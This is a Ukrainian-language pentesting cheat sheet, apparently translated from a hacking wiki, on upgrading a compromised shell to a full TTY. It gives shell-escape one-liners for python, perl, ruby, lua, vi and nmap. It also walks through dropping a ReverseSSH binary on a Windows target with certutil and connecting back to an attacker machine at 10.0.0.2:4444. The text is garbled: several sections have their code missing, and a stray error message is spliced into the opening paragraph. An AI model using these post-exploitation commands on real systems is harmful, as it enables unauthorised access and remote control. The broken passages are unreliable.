Full TTYs
Повний TTY
Зверніть увагу, що оболонку, яку ви встановлюєте у змінну SHELL
, повинна бути перелічена всередині /etc/shells або Значення для змінної SHELL не було знайдено в файлі /etc/shells Цей випадок було повідомлено
. Також зверніть увагу, що наступні уривки працюють лише в bash. Якщо ви в zsh, переключіться на bash перед отриманням оболонки, запустивши bash
.
Python
Ви можете отримати кількість рядків та стовпців, виконавши stty -a
скрипт
socat
Створення оболонок
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
perl:
exec "/bin/sh";
ruby:
exec "/bin/sh"
lua:
os.execute('/bin/sh')
IRB:
exec "/bin/sh"
vi:
:!bash
vi:
:set shell=/bin/bash:shell
nmap:
!sh
ReverseSSH
Зручний спосіб для інтерактивного доступу до оболонки, а також для передачі файлів та перенаправлення портів - це розміщення статично зв'язаного ssh-сервера ReverseSSH на цільовій системі.
Нижче наведено приклад для x86
з упакованими за допомогою upx бінарними файлами. Для інших бінарних файлів перевірте сторінку випусків.
Підготуйте локально для перехоплення запиту на перенаправлення порту ssh:
(2a) Ціль Linux:
(2b) Ціль Windows 10 (для попередніх версій перевірте readme проекту):
```bash # Drop it via your preferred way, e.g. certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@10.0.0.2
Немає TTY
Якщо з якоїсь причини ви не можете отримати повний TTY, ви все ще можете взаємодіяти з програмами, які очікують введення користувача. У наступному прикладі пароль передається до sudo
для читання файлу:
Last updated